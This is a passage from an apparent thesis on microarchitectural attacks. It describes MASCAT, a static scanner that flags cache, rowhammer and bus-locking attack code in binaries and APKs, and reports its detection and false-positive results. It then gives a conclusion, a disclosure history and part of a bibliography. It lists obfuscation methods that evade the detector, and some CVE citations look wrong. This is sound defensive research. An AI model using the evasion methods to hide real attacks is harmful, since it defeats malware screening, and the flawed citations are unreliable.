(from maximum to minimum) all the characteristics we described in Section 7.4.3.1.
For each of them, if the attribute is found in the binary, MASCAT first checks
whether a related characteristic exists. If they do exist, the threat score is updated
for that binary location. For instance, we know memory barrier instructions are not
a threat if they are not issued together with timers, lock or eviction instructions.
If no related attributes are found, our tool continues to detect whether any other
attributes exist. Indeed, if no attributes exist at all, the threat score has to be
updated (since this is the first attribute found in that location). However, if other
attributes are found, then the thread score is not changed as a higher threat level
has already been assigned. In any of the above cases, the characteristics are marked
to be present (if found) in the appropriate locations. The relations between char-
acteristics are defined according to the description given in Section 7.4.2. In order
to detect the entire range of microarchitectural attacks discussed, we designed the
following score based threat classification:
Maximum Threat Attributes:
Attributes from this category are immediately considered a threat when found by
our algorithm. Specific flushing instructions, non-temporal stores and selfmap trans-
lation attributes fall into this category. The first two because they can directly imply
a rowhammer attack, the latter one because having access to the physical address
space can become a threat for both cache and DRAM access rowhammer attacks.
The location where these attributes (and the functions calling them) are found will
be marked in red.
Medium Threat Attributes:
Attributes from this category are not immediately considered threats but rather
warnings. The locations in which these attributes are found will only be considered
a threat if the rest of the necessary attributes (as described in Section 7.4.2) are
found within the same location of the code. Examples of these attributes are rdtscp
158
and lock instructions, as well as pointer chasing, set-concurrent jumps and jump
opcode assignments. A combination of two related medium threat attributes will
immediately be considered a threat, while a combination of two non-related medium
threat attributes will not change the score. For instance, rdtscp andlock instruc-
tions together would be considered a threat, while lock instructions with pointer
chasing functions are not (see Section 7.4.2).
Low Threat Attributes:
Attributes from this category are not immediately considered threats but rather
small warnings. Only if these attributes are observed within the same location of
necessary medium or low threat attributes the code portion is considered a threat.
Examples of these kind of attributes are memory barriers, timers (excluding rdtscp )
and affinity assignments. Only if two low threat attributes are observed with a
medium threat attribute the code location is classified as a threat.
7.4.3.3 Tool Framework
In order to implement the specified design we utilize the popular IDA PRO static
binary analyzer. We chose IDA because it offers a high level programming language
and several built-in functions that facilitate our attribute finding design. Note that
developing our tool with another open source static binary analyzer (e.g. hooper)
should also be feasible with additional work.
In summary, MASCAT works by analyzing elf files without the need for the source
code. The tool detects the attributes described above, coloring those locations where
microarchitectural attack related features are found. Our tool colors threats in red,
warnings in orange and small warnings in magenta. Note that, as MASCAT finds new
attributes in already colored locations, the colors of those locations might change.
Once the analysis is finished, MASCAT outputs a summary of the locations in which
threats and warnings were found (by scanning the color of those locations) and their
root of cause (e.g., rdtsc instruction, lock instructions, etc.). Figure 7.22 shows a
visual example of an analysis made to one of our microarchitectural attacks. The
binary is considered a threat for utilizing both flush and fine grain timer instructions.
While our analysis on x86-64 binaries is performed in a single step, our analysis
on Android APKs needs to be performed in a dual step. First, the attributes that
we look for are scanned within the existing native code in the APK, as with x86-64
binaries. However, we find this non-sufficient, as although the necessary attributes
might be found, they might only interact together in the Dalvik Executable (DEX)
code. For that reason, the DEX file is analyzed in a second step to check its inter-
action with the native code, trying to find whether the attributes interact with each
other. This approach prevents an attacker from creating different microarchitectural
attack functions that interact and are called in the DEX file.
159
Figure 7.22: Visual example output of MASCAT , in which a flush and reload attack
is detected
7.4.4 Experiment Setup
Our analysis includes the Mastik tool (which performs all range of L1 and LLC
attacks) designed by Yarom et al. [Yar16], LLC attacks and memory bus locking at-
tacks designed by Inci et al. [IGES16] and Irazoqui et al. [IIES14b, IES15a, IGI+16b],
LLC, cache prefetching, DRAM access and rowhammer attacks designed by Gruss
et al. [GSM15, PGM+16, GMF+16, GMM16], rowhammer attacks by Van der Veen
et al. [vdVFL+16], rowhammer attacks designer Google Project Zero (which were
modified to cover [QS16]), L1 cache attacks from Tampere university [ABG10], all
versions of cache attacks for ARM designed by Lipp et al. [LGS+16] and DRAM ac-
cess attacks designed by Abraham Fernandez, former Intel employee. Some of these
codes were modified to cover several corner cases (e.g., thread created timers, evic-
tion set creations, non-temporal accesses, doble-sided rowhammer, etc.). In total,
we cover a total of 32 different microarchitectural attacks.
Our false positive analysis covers both x86-64 binaries compiled under Linux
OSs and ARM targeted Android APKs. As the x86-64 benign binary set that was
included for our test framework, we chose around 750 binaries from the Ubuntu
Software Center plus the Phoronix test-suite [pho]. The Phoronix test-suite choice
was not random, but was intended to maximize the number of false positives that
our tool can output, as it contains performance benchmarks that might use some
of the attributes that our tool looks for. In the case of android APKs we analyzed
all the applications offered by www.androiddrawer.com , which contain applications
with a huge variety of functionalities, e.g., media streaming or communication. In
total we have analyzed 1268 Android applications.
160
Table 7.4: Percentage of attacks correctly flagged by MASCAT (true positives).
Attack Type Number of % of attacks
attacks correctly flagged
Cache attacks 25 100%
Rowhammer 5 80%
Bus Locking 2 100%
Total 32 96.87%
7.5 Results
This section presents the results obtained both from analyzing (a priori) benign and
malicious applications. The idea behind this analysis is to obtain a notion for the
false negative/positive rate that MASCAT presents in real world applications. We
first present an analysis on the detection rate of all the microarchitectural attack
codes that we were able to obtain. Next, in order to obtain a good estimation
on the false positive rate that MASCAT presents with regular-purpose binaries, we
analyze over 700 and a thousand Ubuntu Software Center and Android applications
respectively.
7.5.1 Analysis of Microarchitectural Attacks
We evaluate the full range of microarchitectural attacks that we described in Sec-
tion 7.4.4, i.e., a list of 32 different microarchitectural attacks. Note that these
attacks include both x86-64 binaries and Android APKs, compiled with Android
NDK. The results, are presented in Table 7.4, which expresses the number of attacks
that were correctly flagged detected by MASCAT .
We observe that the overall success rate of MASCAT was of 96.87% for the
32 malicious codes analyzed. In particular, MASCAT was able to correctly iden-
tify all cache attacks and bus locking covert channels, and all but one rowhammer
attack codes. The only code that MASCAT was not able to identify was Dram-
mer [vdVFL+16]. The reason behind it is that the authors utilize special DMA
memory allocation that does not get loaded in the cache, and therefore no flushing,
non-temporal loads nor eviction sets are necessary to apply it. However, as we stated
in Section 7.4.3, Drammer is the only attack that is identified by regular commercial
antivirus tools . Thus, we believe that MASCAT can be used in conjunction with
regular malware antivirus tools to catch the entire attack spectrum.
7.5.2 Results for Benign Binaries
As for the x86-64 benign binaries, the results are presented in Table 7.5, in which
binaries are divided into groups as we downloaded them from the Ubuntu Software
Center. We observed that even though binaries with at least one attribute of those
161
Table 7.5: Results for different groups of binaries from Ubuntu Software Center.
Group Number of % of binaries with % of binaries
functionality binaries at least one attribute considered threat
accessories 122 18 0
education 73 19.17 0
developer tools 96 23.9 0
games 116 42.2 0
graphics 84 36.9 1.2
internet 76 25.0 2.63
office 75 12 0
phoronix 100 56 6
total 742 30.05 1.2
we were looking for are rather common (30%), we only had 9 binaries in total that
were categorized as threats. Particularly interesting is the case of including the
Phoronix-test suite in our analysis, as 6 of the 9 binaries categorized as threats were
part of it. This is not that surprising considering that Phoronix test-suite binaries
are usually benchmarking applications. The overall false positive rate was 1.2%, but
could have been lowered without considering the benchmarking applications.
Table 7.7 shows the reason why those 9 binaries flagged as threats. Nqueens,
multichase, mencoder and fs mark benchmarks flagged due to the usage of non-
temporal instructions. Aseprite, Claws mail, Fldigi, Fio and ffmpeg binaries flagged
because of the usage of timers, memory barriers and pointer chasing/set congru-
ent jump instructions within the same location. Lastly fs mark and again ffmpeg
flagged because of the usage of timers and atomic instructions, indicating a potential
memory bus locking covert channel exploitation.
In the case of Android applications, a total of 1268 APKs were analyzed, for
which table 7.6 presents per group threat detection statistics, including the percent-
age of APKs within the group that presented at least one of the attributes we look
for, and the percentage of APKs that were considered a threat. Our overall results
indicate that the number of APKs that might have at least one of the attributes
that we look for is rather high, almost 1/3 of the APKs. However, our results also
indicate that the number of APKs that we found to be flagged as threat is very low,
i.e., only 4 of the total of 1268 APKs were considered threats. These applications are
google allo, azar, eve period tracker and spendless. As before, Table 7.7 shows that
the 4 APKs flagged because of the same reason: a combination of timers, fences and
pointer chasing loop eviction mechanisms that can be an indicator of both cache/-
DRAM attacks. Thus, we observe that the combination of attributes necessary to
develop an attack is rather difficult to observe in benign applications, giving a very
low number of false positives.
In summary covering the 4 microarchitectural attack range only lead us to 97%
true positive rate in benign benchmarking code and an average of 0.75% when we
analyzed a total of around two thousand regular purpose applications.
162
Table 7.6: Results for different groups of APKs.
Group Number % of APKs with % of APKs
functionality of APKs at least one attribute considered threat
books 28 42 0
cars 3 0 0
comic 10 30 0
communication 130 32.3 1.53
education 49 16.3 0
entertainment 48 31.25 0
finance 35 22.8 2.86
food 1 100 0
games 130 32.3 0
health 65 24.61 1.53
libraries-demo 2 0 0
life style 30 26.6 0
media video 25 64 0
music audio 39 48.7 0
magazines 52 19.2 0
personalization 59 20.33 0
photography 64 50 0
productivity 144 22.2 0
shopping 24 29.1 0
social 59 32.2 0
sports 16 20 0
tools 175 23.4 0
transport 20 20 0
travel 38 34.2 0
video transport 1 100 0
weather 21 19 0
total 1268 28.3 0.31
Table 7.7: Explanation for benign binaries classified as threats.
binary flagged Reason
Ubuntu Software Center:
aseprite timers, memory barriers and pointer chasing
claws mail timers, memory barriers and pointer chasing
ffmpeg timers, memory barriers pointer chasing and lock
fio timers, memory barriers and pointer chasing
fldigi timers, memory barriers and pointer chasing
fsmark timers, lock and non-temporal load/store
mencoder non-temporal load/store
multichase non-temporal load/store
nqueens non-temporal load/store functions
Android APKs:
google allo timers, memory barriers, pointer chasing
azar timers, memory barriers, pointer chasing
eve period timers, memory barriers, pointer chasing
spendless timers, memory barriers, pointer chasing
163
7.5.3 Limitations
As with any other static analysis approach, we need to take into account the possible
obfuscation techniques that an attacker can implement to bypass MASCAT :
•CISC instruction offset obfuscation: An attacker can take advantage of
the variable instruction length in CISC ISAs by inserting arbitrary amount
of junk bytes that would later be unreachable during run time. In this way,
static disassemblers mistakenly interpret a large part of the binary. As our
approach largely depends on a good interpretation of the instructions utilized,
this approach would indeed bypass our current version of MASCAT . However,
multiple de-obfuscation techniques have been proposed to cope with this issue,
both for other disassemblers and for IDA Pro [KRVV04, Rol16]. Thus, our
tool can be utilized in conjunction with one of these approaches to avoid the
successful usage of such obfuscation techniques.
•RISC instruction offset obfuscation: An attacker can also introduce junk
padding bytes on RISC arichtectures, aiming at distracting our static disas-
sembler. However, since the ARM architecture features a fixed length ISA,
our defense mechanism would only have to be run with four different offsets
(0, 1, 2 and 3 byte offset) to be able to cover all possibilities, thereby detecting
the obfuscation.
•Encrypted executable code: Another popular approach to bypass static
analysis is to have a binary that contains, in an encrypted form, the code
containing a microarchitectural attack. When the binary is executed, the
microarchitectural attack code is decrypted and saved into another binary file,
which is subsequently executed. Such an approach would bypass our system,
but fortunately, it is very unlikely that it bypasses other commercial antivirus
software. In order to cope with this issue we suggest utilizing MASCAT together
with other existing antivirus tools: not only to detect this particular malicious
case, but to detect whether the binary contains further non-microarchitectural
malware.
•Alternative mechanisms/covert channels to execute microarchitec-
tural attacks: An attacker, knowing the parameters we are looking for,
can try to bypass our approach by discovering and implementing alternative
methodologies to execute an attack. One of the ways to defend against this
is to hide the approach that MASCAT performs, so that the attacker does not
have a motivation to change his attack patterns. An alternative approach is to
keep adding features to MASCAT as new attack methodologies arise. Indeed
,we encourage the research community to vary their mechanisms so that we
can incorporate them to MASCAT and target a broader set of characteristics.
164
7.5.4 Outcomes
We presented the first static code analysis tool, MASCAT capable of scanning for
common microarchitectural attacks. Microarchitectural attacks are particularly
damaging as they are hard to detect since they use standard resources, e.g. memory
accesses, made available to applications at the lowest privilege level. Given the rise
of malicious code in app stores and online repositories it becomes essential to scan
applications for such stealthy attacks. The proposed tool, MASCAT , is ideally suited
to fill this need. MASCAT can be used by app store service providers to perform
large scale fully automated analysis of applications, and prevent a malicious user
from posting a microarchitectural attack in the guise of an innocent looking appli-
cation to an official app store. The initial MASCAT suite includes attack vectors
to cover popular cache/DRAM access attacks, rowhammer and memory bus covert
channels. Nevertheless, our tool is easily extensible to include newer attack vectors
as they arise.
165
Chapter 8
Conclusion
In the last years we witnessed the large adoption of hardware co-resident multi-
tenant/application solutions. The confidence that customers place on these solu-
tions is mainly based on the fact that their applications are executed in sandboxed
environments that should, en theory, ensure proper customer isolation. Examples
of these techniques are implemented, among others, in commercial IaaS clouds or
smartphones. However, such mechanisms mostly focus on achieving good software
isolation, while they disregard the potential threats due to concurrent hardware us-
age. Our work responds to such a concern; first by showing that microarchitectural
attacks bypass sandboxing techniques and are able to recover fine grain information,
second, by proposing mechanisms to avoid such exploitation from succeeding.
Our work demonstrates that exploiting hardware leakages in realistic widely
adopted scenarios like cloud computing infrastructures can become a major threat
for hardware co-resident users. In particular, we utilized the shared last level cache
to infer information, which offers both high resolution and applicability at least
across cores. We introduced three main attack designs, Flush and Reload ,Invali-
date and Transfer and Prime and Probe , each of which has different characteristics
and can be applied in different scenarios. The first two are low noise attacks that
can be implemented in systems where memory deduplication mechanisms are imple-
mented, e.g., default configurations of VMware or the KVM hypervisor. The latter
does not require special assumptions to succeed, and thus, is applicable in all major
commercial clouds, as demonstrated by our successful attack in Amazon EC2. Fur-
ther, the proposed attack demonstrated to recover fine grain information like AES
and RSA keys and TLS session messages across VMs. Any of these key retrievals
happening in non-academic environments would have severe security implications
for the victim, as the attacker would be able to, e.g., read encrypted communications
or impersonate him.
Despite the severity of the threat that microarchitectural attacks posed in ex-
isting commercial software and the popularity they acquired in the last years in
academic environments, we have not observed existing countermeasures being de-
ployed in the systems that we tried to exploit. Examples of potential countermea-
166
sures include page coloring, performance hardware event monitorization or cache
line locking. However, all of them introduce big performance overheads that seems
that commercial system designers are not willing to pay. In response to this con-
cern, we propose two countermeasures that can help cache attacks from being widely
adopted while not suffer from continuous performance costs. The first verifies the
correctness of cryptographic software to ensure no cache leakage is present. We
believe that one of the safest mechanisms to avoid sensitive information from being
stolen is ensure the proper design of the security solution. For that purpose, our tool
finds key dependent data that is verified for leakage. Although we found alarming
numbers (50% of the implementations leaked information), we worked closely with
the designers to address them. The second countermeasure we propose is MASCAT ,
a tool that detects microarchitectural attacks embedded in binaries to prevent their
distribution in official app repositories, emulating a ”microarchitectural attack an-
tivirus”’. Currently online application distributors lack of proper mechanisms to
verify that the binaries being offered are microarchitectural attack free. MASCAT is
the perfect tool to be adopted for such a purpose.
In short, our work demonstrated that microarchitectural attacks have to be con-
sidered one of many threats that systems relying on sandboxing techniques have to
take into account. In this sense, our final goal was to help building stronger security
solutions that ensure the privacy of those using them, specially, as the number of
scenarios in which hardware co-resident applications are concurrently executed in-
creases. We believe that the adoption of the proposed (and other) countermeasures
is highly necessary to defeat the threat, and thus, encourage security solution de-
signers to make it happen. Their goal and ours is indeed the same: guarantee the
protection of our data.
Outcomes of Our Work
The microarchitectural attacks that we exploited are based on both specific char-
acteristics of the systems in which they were carried out and exploitation of vul-
nerabilities on widely used open source cryptographic libraries. Thus, our work re-
quired several vulnerability analysis skills. We believe it is important to verify and
strengthen the design security solutions against all possible attack vectors, including
the microarchitectural attacks we exploited. We understand we have a responsibil-
ity to work with the designers of those products that we exploited. Therefore, we
notified all of them about our findings, including but not limited to Amazon EC2,
VMware, Intel, AMD and several cryptographic library designers. To help them
fix the vulnerabilities, we offered our help to reproduce the attack and proposed
possible solutions. In fact, many of our results resulted in a security update of the
exploited product.
In Section 4, we developed our attack mainly utilizing VMware as our default
hypervisor. Thus, we decided to alert them about the threat that such memory
sharing mechanisms could add to virtualized environments. We also aid them re-
167
producing the attack described in Section 4.4 in their systems. After successfully
reproducing our results, VMware decided to disable Transparent Page Sharing by
default (CVE-2014-3566), and leave it as a add-on that end-users can activate un-
derstanding the risk that it poses. A better description explaining the reasons to
change the feature settings can be found in [VMwa].
In Section 4.5 we further exploited vulnerabilities in the design of the TLS code,
mainly involving secret dependent non-constant execution flow. All the leakage cases
observed in the section were notified accordingly to the appropriate cryptographic
library designers. However, only PolarSSL (now MbedTLS) decided to notify us
about the changes made to avoid the leakage, and asked us to verify the correctness
of the new implementation, although without issuing a CVE number.
In Section 7.3 we performed an analysis of the correctness of the design of AES,
RSA and ECC cryptographic algorithms in 8 main cryptographic libraries. We
found that 50% of them leaked information that could lead to secret key retrieval.
We disclosed all our findings to the appropriate cryptographic library designers.
Although some of the vulnerabilities are still being studied and fixed, our work
already resulted in many of these vulnerabilities fixes. WolfSSL updated the AES,
RSA and ECC design in response to our leakage analysis, as described in CVE
numbers 2016-7438, 2016-7439 and 2016-7440 respectively. Bouncy Castle updated
the AES design to avoid the leakage exploited in this work, as described in CVE
number 2016-10003323. Lastly, the RSA implementation of Intel’s closed source
cryptographic library was updated after we found that a vulnerability could lead to
the full secret key extraction, and received the CVE-2016-8100 number.
168
Bibliography
[ABB+16] Jose Bacelar Almeida, Manuel Barbosa, Gilles Barthe, Fran ̧ cois Du-
pressoir, and Michael Emmi. Verifying Constant-Time Implementa-
tions. In 25th USENIX Security Symposium (USENIX Security 16) ,
pages 53–70, Austin, TX, August 2016. USENIX Association.
[ABG10] Onur Acii ̧ cmez, Billy Bob Brumley, and Philipp Grabher. New Re-
sults on Instruction Cache Attacks. In Stefan Mangard and Fran ̧ cois-
Xavier Standaert, editors, Cryptographic Hardware and Embedded Sys-
tems, CHES 2010, 12th International Workshop, Santa Barbara, CA,
USA, August 17-20, 2010. Proceedings , volume 6225 of Lecture Notes
in Computer Science , pages 110–124. Springer, 2010.
[ABL97] Glenn Ammons, Thomas Ball, and James R Larus. Exploiting Hard-
ware Performance Counters with Flow and Context Sensitive Profiling.
ACM Sigplan Notices , 32(5):85–96, 1997.
[Acı07] Onur Acıi ̧ cmez. Yet Another MicroArchitectural Attack: Exploiting
I-Cache. In Proceedings of the 2007 ACM Workshop on Computer
Security Architecture , 2007.
[AE13] Hassan Aly and Mohammed ElGayyar. Attacking AES Using Bern-
stein’s Attack on Modern Processors. In AFRICACRYPT , pages 127–
139, 2013.
[AEW09] Andrea Arcangeli, Izik Eidus, and Chris Wright. Increasing Memory
Density by Using KSM. In Proceedings of the linux symposium , pages
19–28, 2009.
[AKKS07] Onur Acıi ̧ cmez, C  ̧ etin K. Ko ̧ c, and Jean-Pierre Seifert. Predicting
Secret Keys Via Branch Prediction. In Topics in Cryptology CT-RSA
2007, volume 4377, pages 225–242. 2007.
[AKS07] Onur Acii ̧ cmez, C  ̧ etin Kaya Ko ̧ c, and Jean-Pierre Seifert. On the Power
of Simple Branch Prediction Analysis. In Proceedings of the 2Nd ACM
Symposium on Information, Computer and Communications Security ,
ASIACCS ’07, pages 312–320, New York, NY, USA, 2007. ACM.
169
[Alp09] Seeking Alpha. Looking At Nvidia’s Competition, April 2009.
[AMD] AMD. HyperTransport Technology white paper. http://www.
hypertransport.org/docs/wp/ht_system_design.pdf .
[ARM09] ARM. ARM Security Technology - Building a Secure System using
TrustZone Technology, April 2009.
[AS07] Onur Aciicmez and Jean-Pierre Seifert. Cheap Hardware Parallelism
Implies Cheap Security. In Fault Diagnosis and Tolerance in Cryptog-
raphy, 2007. FDTC 2007. Workshop on , pages 80–91. IEEE, 2007.
[AS08] Onur Acıi ̧ cmez and Werner Schindler. A Vulnerability in RSA Imple-
mentations Due to Instruction Cache Analysis and its Demonstration
on OpenSSL. In Topics in Cryptology–CT-RSA 2008 , pages 256–273.
Springer, 2008.
[BB03] David Brumley and Dan Boneh. Remote Timing Attacks are Practical.
InProceedings of the 12th USENIX Security Symposium , pages 1–14,
2003.
[BCO04] Eric Brier, Christophe Clavier, and Francis Olivier. Correlation Power
Analysis with a Leakage Model. In Marc Joye and Jean-Jacques
Quisquater, editors, Cryptographic Hardware and Embedded Systems
- CHES 2004 , volume 3156 of Lecture Notes in Computer Science ,
pages 16–29. Springer Berlin Heidelberg, 2004.
[BDF+03] Paul Barham, Boris Dragovic, Keir Fraser, Steven Hand, Tim Harris,
Alex Ho, Rolf Neugebauer, Ian Pratt, and Andrew Warfield. Xen and
the Art of Virtualization. ACM SIGOPS Operating Systems Review ,
37(5):164–177, 2003.
[BECN+04] Hagai Bar-El, Hamid Choukri, David Naccache, Michael Tunstall, and
Claire Whelan. The Sorcerer’s Apprentice Guide to Fault Attacks.
IACR Cryptology ePrint Archive , 2004:100, 2004.
[Ber04] Daniel J. Bernstein. Cache-timing attacks on AES, 2004. URL:
http://cr.yp.to/papers.html#cachetiming .
[BH09] Billy Bob Brumley and Risto M Hakala. Cache-Timing Template At-
tacks. In International Conference on the Theory and Application of
Cryptology and Information Security , pages 667–684. Springer, 2009.
[BM06] Joseph Bonneau and Ilya Mironov. Cache-Collision Timing Attacks
against AES. In CHES 2006 , volume 4249 of Springer LNCS , pages
201–215, 2006.
170
[BM15] Sarani Bhattacharya and Debdeep Mukhopadhyay. Who Watches the
Watchmen?: Utilizing Performance Monitors for Compromising Keys
of RSA on Intel Platforms. In Cryptographic Hardware and Embed-
ded Systems – CHES 2015: 17th International Workshop, Saint-Malo,
France, September 13-16, 2015, Proceedings , pages 248–266. Springer
Berlin Heidelberg, Berlin, Heidelberg, 2015.
[BM16] Sarani Bhattacharya and Debdeep Mukhopadhyay. Curious Case of
Rowhammer: Flipping Secret Exponent Bits Using Timing Analysis.
In Benedikt Gierlichs and Y. Axel Poschmann, editors, Cryptographic
Hardware and Embedded Systems – CHES 2016: 18th International
Conference, Santa Barbara, CA, USA, August 17-19, 2016, Proceed-
ings, pages 602–624, Berlin, Heidelberg, 2016. Springer Berlin Heidel-
berg.
[BMD+17] F. Brasser, U. M ̈ uller, A. Dmitrienko, K. Kostiainen, S. Capkun, and
A.-R. Sadeghi. Software Grand Exposure: SGX Cache Attacks Are
Practical. ArXiv e-prints , February 2017.
[Bri] Intel Sandy Bridge. Intels Sandy Bridge Microarchitecture. http:
//www.realworldtech.com/sandy-bridge/ .
[BT11] Billy Bob Brumley and Nicola Tuveri. Remote Timing Attacks Are
Still Practical. In Vijay Atluri and Claudia Diaz, editors, Computer
Security – ESORICS 2011: 16th European Symposium on Research in
Computer Security, Leuven, Belgium, September 12-14,2011. Proceed-
ings, pages 355–371, 2011.
[BvdPSY14] Naomi Benger, Joop van de Pol, Nigel P. Smart, and Yuval Yarom.
“Ooh Aah... Just a Little Bit”: A Small Amount of Side Channel Can
Go a Long Way. In CHES , pages 75–92, 2014.
[CCC+13] Wei Chen, Szu-Liang Chen, Siufu Chiu, R. Ganesan, V. Lukka, W.W.
Mar, and S. Rusu. A 22nm 2.5MB Slice on-Die L3 Cache for the
Next Generation Xeon Processor. In VLSI Circuits (VLSIC), 2013
Symposium on , pages C132–C133, June 2013.
[CDE08] Cristian Cadar, Daniel Dunbar, and Dawson Engler. KLEE: Unas-
sisted and Automatic Generation of High-coverage Tests for Complex
Systems Programs. In Proceedings of the 8th USENIX Conference on
Operating Systems Design and Implementation , OSDI’08, pages 209–
224, Berkeley, CA, USA, 2008. USENIX Association.
[CFS] CFS. CFS Scheduler. https://www.kernel.org/doc/
Documentation/scheduler/sched-design-CFS.txt .
171
[CJ06] Sangyeun Cho and Lei Jin. Managing Distributed, Shared L2 Caches
Through OS-Level Page Allocation. In Proceedings of the 39th Annual
IEEE/ACM International Symposium on Microarchitecture , MICRO
39, pages 455–468, 2006.
[CKD+10] Pat Conway, Nathan Kalyanasundharam, Gregg Donley, Kevin Lepak,
and Bill Hughes. Cache Hierarchy and Memory Subsystem of the AMD
Opteron Processor. IEEE Micro , 30(2):16–29, March 2010.
[CRR03] Suresh Chari, JosyulaR Rao, and Pankaj Rohatgi. Template Attacks.
pages 13–28, 2003.
[CS04] Matthew J. Campagna and Amit Sethi. Key recovery method for CRT
implementation of rsa. Cryptology ePrint Archive, Report 2004/147,
2004. http://eprint.iacr.org/ .
[CSY15] Marco Chiappetta, Erkay Savas, and Cemal Yilmaz. Real Time De-
tection of Cache-Based Side-Channel Attacks Using Hardware Perfor-
mance Counters. Technical report, Cryptology ePrint Archive, Report
2015/1034, 2015.
[CVBS09] Bart Coppens, Ingrid Verbauwhede, Koen De Bosschere, and Bjorn De
Sutter. Practical Mitigations for Timing-Based Side-Channel Attacks
on Modern x86 Processors. In Proceedings of the 2009 30th IEEE
Symposium on Security and Privacy , SP ’09, pages 45–60, Washington,
DC, USA, 2009. IEEE Computer Society.
[CWR09] Scott A. Crosby, Dan S. Wallach, and Rudolf H. Riedi. Opportunities
and Limits of Remote Timing Attacks. ACM Trans. Inf. Syst. Secur. ,
12(3):17:1–17:29, January 2009.
[D’A15] Sophia D’Antoine. Exploiting Out of Order Execution For Covert
Cross VM Communication. In Blackhat 2015 , Las Vegas, Aug 2015.
[DMWS12] John Demme, Robert Martin, Adam Waksman, and Simha Sethumad-
havan. Side-channel vulnerability factor: A metric for measuring infor-
mation leakage. In Proceedings of the 39th Annual International Sym-
posium on Computer Architecture , ISCA ’12, pages 106–117, Washing-
ton, DC, USA, 2012. IEEE Computer Society.
[DR99] Joan Daemen and Vincent Rijmen. Aes proposal: Rijndael, 1999.
[DSKM+13] Fabrizio De Santis, Michael Kasper, Stefan Mangard, Georg Sigl,
Oliver Stein, and Marc St ̈ ottinger. On the Relationship between Corre-
lation Power Analysis and the Stochastic Approach: An ASIC Designer
Perspective. In Goutam Paul and Serge Vaudenay, editors, Progress
172
in Cryptology INDOCRYPT 2013 , volume 8250 of Lecture Notes in
Computer Science , pages 215–226. Springer International Publishing,
2013.
[Dwo04] Morris J. Dworkin. Sp 800-38c. recommendation for block cipher modes
of operation: The ccm mode for authentication and confidentiality.
Technical report, Gaithersburg, MD, United States, 2004.
[EP16] Dmitry Evtyushkin and Dmitry Ponomarev. Covert Channels Through
Random Number Generator: Mechanisms, Capacity Estimation and
Mitigations. In Proceedings of the 2016 ACM SIGSAC Conference
on Computer and Communications Security , CCS ’16, pages 843–857,
New York, NY, USA, 2016. ACM.
[Fan15] Fangfei Liu and Yuval Yarom and Qian Ge and Gernot Heiser and
Ruby B. Lee. Last level Cache Side Channel Attacks are Practical.
InProceedings of the 2015 IEEE Symposium on Security and Privacy ,
SP ’15, pages 605–622, Washington, DC, USA, 2015. IEEE Computer
Society.
[FP13] Nadhem J. Al Fardan and Kenneth G. Paterson. Lucky Thirteen:
Breaking the TLS and DTLS Record Protocols. In 2013 IEEE Sym-
posium on Security and Privacy , SP ’13, pages 526–540, May 2013.
[GBK11] David Gullasch, Endre Bangerter, and Stephan Krenn. Cache Games –
Bringing Access-Based Cache Attacks on AES to Practice. In Proceed-
ings of the 2011 IEEE Symposium on Security and Privacy , SP ’11,
pages 490–505, Washington, DC, USA, 2011. IEEE Computer Society.
[GBTP08] Benedikt Gierlichs, Lejla Batina, Pim Tuyls, and Bart Preneel. Mu-
tual information analysis. In International Workshop on Crypto-
graphic Hardware and Embedded Systems—CHES 2016 , pages 426–
442. Springer, 2008.
[GMF+16] Daniel Gruss, Cl ́ ementine Maurice, Anders Fogh, Moritz Lipp, and
Stefan Mangard. Prefetch side-channel attacks: Bypassing smap and
kernel aslr. In Proceedings of the 2016 ACM SIGSAC Conference
on Computer and Communications Security , CCS ’16, pages 368–379,
New York, NY, USA, 2016. ACM.
[GMM16] Daniel Gruss, Cl ́ ementine Maurice, and Stefan Mangard. Rowham-
mer.Js: A Remote Software-Induced Fault Attack in JavaScript. In
Proceedings of the 13th International Conference on Detection of In-
trusions and Malware, and Vulnerability Assessment - Volume 9721 ,
DIMVA 2016, pages 300–321, New York, NY, USA, 2016. Springer-
Verlag New York, Inc.
173
[GMWM16] Daniel Gruss, Cl ́ ementine Maurice, Klaus Wagner, and Stefan Man-
gard. Flush+Flush: A Fast and Stealthy Cache Attack. In Detection
of Intrusions and Malware, and Vulnerability Assessment: 13th Inter-
national Conference, DIMVA 2016, San Sebasti ́ an, Spain, July 7-8,
2016, Proceedings , pages 279–299, Cham, 2016. Springer International
Publishing.
[GPPT15] Daniel Genkin, Lev Pachmanov, Itamar Pipman, and Eran Tromer.
Stealing Keys from PCs Using a Radio: Cheap Electromagnetic At-
tacks on Windowed Exponentiation. In CHES , Lecture Notes in Com-
puter Science, pages 207–228. Springer, 2015.
[GSM15] Daniel Gruss, Raphael Spreitzer, and Stefan Mangard. Cache Template
Attacks: Automating Attacks on Inclusive Last-Level Caches. In 24th
USENIX Security Symposium , pages 897–912. USENIX Association,
2015.
[GST14] Daniel Genkin, Adi Shamir, and Eran Tromer. RSA Key Extraction
via Low-Bandwidth Acoustic Cryptanalysis. In CRYPTO 2014 , pages
444–461, 2014.
[Ham09] Mike Hamburg. Accelerating AES with Vector Permute Instructions.
In Christophe Clavier and Kris Gaj, editors, Cryptographic Hardware
and Embedded Systems - CHES 2009: 11th International Workshop
Lausanne, Switzerland, September 6-9, 2009 Proceedings , 2009.
[Ham13] Mike Hamburg. Bit level Error Correction Algorithm for RSA Keys.
Personal Communication, Cryptography Research, Inc., 2013.
[HDWH12] Nadia Heninger, Zakir Durumeric, Eric Wustrow, and J. Alex Halder-
man. Mining Your Ps and Qs: Detection of Widespread Weak Keys
in Network Devices. In Presented as part of the 21st USENIX Secu-
rity Symposium (USENIX Security 12) , pages 205–220, Bellevue, WA,
2012. USENIX.
[hen] Intel Ivy Bridge Cache Replacement Policy. http://blog.
stuffedcow.net/2013/01/ivb-cache-replacement/ .
[HFFA10] Nikos Hardavellas, Michael Ferdman, Babak Falsafi, and Anastasia Ail-
amaki. Near-Optimal Cache Block Placement with Reactive Nonuni-
form Cache Architectures. IEEE Micro’s Top Picks , 30(1):29, 2010.
[HGLS07] Bingsheng He, Naga K. Govindaraju, Qiong Luo, and Burton Smith.
Efficient Gather and Scatter Operations on Graphics Processors. In
Proceedings of the 2007 ACM/IEEE Conference on Supercomputing ,
SC ’07, pages 46:1–46:12, New York, NY, USA, 2007. ACM.
174
[HMV03] Darrel Hankerson, Alfred J. Menezes, and Scott Vanstone. Guide to El-
liptic Curve Cryptography . Springer-Verlag New York, Inc., Secaucus,
NJ, USA, 2003.
[HP11] John L. Hennessy and David A. Patterson. Computer Architecture,
Fifth Edition: A Quantitative Approach . 5th edition, 2011.
[HWH13] Ralf Hund, Carsten Willems, and Thorsten Holz. Practical Timing
Side Channel Attacks Against Kernel Space ASLR. In Proceedings of
